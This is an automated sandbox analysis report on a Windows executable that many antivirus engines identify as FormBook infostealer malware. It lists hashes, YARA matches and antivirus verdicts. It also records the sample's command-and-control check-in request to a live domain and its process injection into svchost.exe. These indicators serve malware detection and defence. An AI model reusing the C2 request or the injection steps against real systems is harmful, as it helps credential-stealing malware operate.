popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

stikontemplate2.1.exe

Generic Malware Malicious Library UPX PE File OS Processor Check PE32
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Jan. 15, 2025, 12:20 p.m. Jan. 15, 2025, 12:22 p.m.
Size 1.7MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 00d95adc7ca2126d416fb70f2fae82f3
SHA256 7981d6c23a9624544c9610e2cfe5de81a0abfc9022efbd2ff0a514a7be98b93a
CRC32 6E6B3D78
ssdeep 24576:zqDEvCTbMWu7rQYlBQcBiT6rprG8aIn40KXZJnSpepJ8GvkZbccsFq6fT:zTvC/MTQYxsWR7aI4XXupebRqb3so
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • Generic_Malware_Zero - Generic Malware
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check

Name Response Post-Analysis Lookup
www.drstone1.click
www.hafwje.bond
www.imxtld.club
www.7b5846.online
A 104.21.40.196
A 172.67.188.70
172.67.188.70
IP Address Status Action
164.124.101.2 Active Moloch
172.67.188.70 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49164 -> 172.67.188.70:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
suspicious_features GET method with no useragent header suspicious_request GET http://www.7b5846.online/hwu6/?yVMpQLaX=YeF1y3FHRZFVGQ1vWfJk7b1+zf3Y35LdyPySvknFh8W+fPSDaqGOdBA5NQ2HzgGxQ+01bUy7&1bz=o8rLp
request GET http://www.7b5846.online/hwu6/?yVMpQLaX=YeF1y3FHRZFVGQ1vWfJk7b1+zf3Y35LdyPySvknFh8W+fPSDaqGOdBA5NQ2HzgGxQ+01bUy7&1bz=o8rLp
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2548
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x734c2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2548
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 16384
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00f7f000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2644
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00920000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
section {u'size_of_data': u'0x000dea00', u'virtual_address': u'0x000d4000', u'entropy': 7.140434182874606, u'name': u'.rsrc', u'virtual_size': u'0x000de80c'} entropy 7.14043418287 description A section with a high entropy has been found
entropy 0.509439359268 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2648
thread_handle: 0x00000138
process_identifier: 2644
current_directory:
filepath: C:\Windows\System32\svchost.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\stikontemplate2.1.exe"
filepath_r: C:\Windows\System32\svchost.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x0000013c
1 1 0
Process injection Process 2548 called NtSetContextThread to modify thread in remote process 2644
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 1768216
registers.edi: 0
registers.eax: 4321584
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000138
process_identifier: 2644
1 0 0
Bkav W32.AIDetectMalware
Lionic Trojan.Win64.Injects.ts93
Cynet Malicious (score: 99)
Skyhigh BehavesLike.Win32.Formbook.th
McAfee Artemis!00D95ADC7CA2
Cylance Unsafe
Sangfor Virus.Win32.Save.a
CrowdStrike win/malicious_confidence_90% (W)
BitDefender Trojan.GenericKD.75375505
Arcabit Trojan.Generic.D47E2391
Symantec Trojan.Gen.MBT
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win32/Injector.Autoit.GTX
APEX Malicious
Avast Script:SNH-gen [Trj]
Kaspersky UDS:DangerousObject.Multi.Generic
Alibaba Trojan:Script/Generic.0fcf34b0
MicroWorld-eScan Trojan.GenericKD.75375505
Emsisoft Trojan.GenericKD.75375505 (B)
F-Secure Dropper.DR/AutoIt.Gen8
TrendMicro Trojan.Win32.FORMBOOK.YXFANZ
McAfeeD Real Protect-LS!00D95ADC7CA2
CTX exe.trojan.autoit
Sophos Mal/Generic-S
FireEye Generic.mg.00d95adc7ca2126d
Google Detected
Avira DR/AutoIt.Gen8
Kingsoft Script.Trojan.Generic.a
GData Win32.Trojan-Stealer.FormBook.T7CLNO
Varist W32/Agent.DGKT-0333
DeepInstinct MALICIOUS
Malwarebytes Generic.Trojan.PatchedPE.DDS
Ikarus Trojan.Autoit
TrendMicro-HouseCall Trojan.Win32.FORMBOOK.YXFANZ
Tencent Script.Trojan.Generic.Rqil
Fortinet AutoIt/Injector.APO!tr
AVG Script:SNH-gen [Trj]
Paloalto generic.ml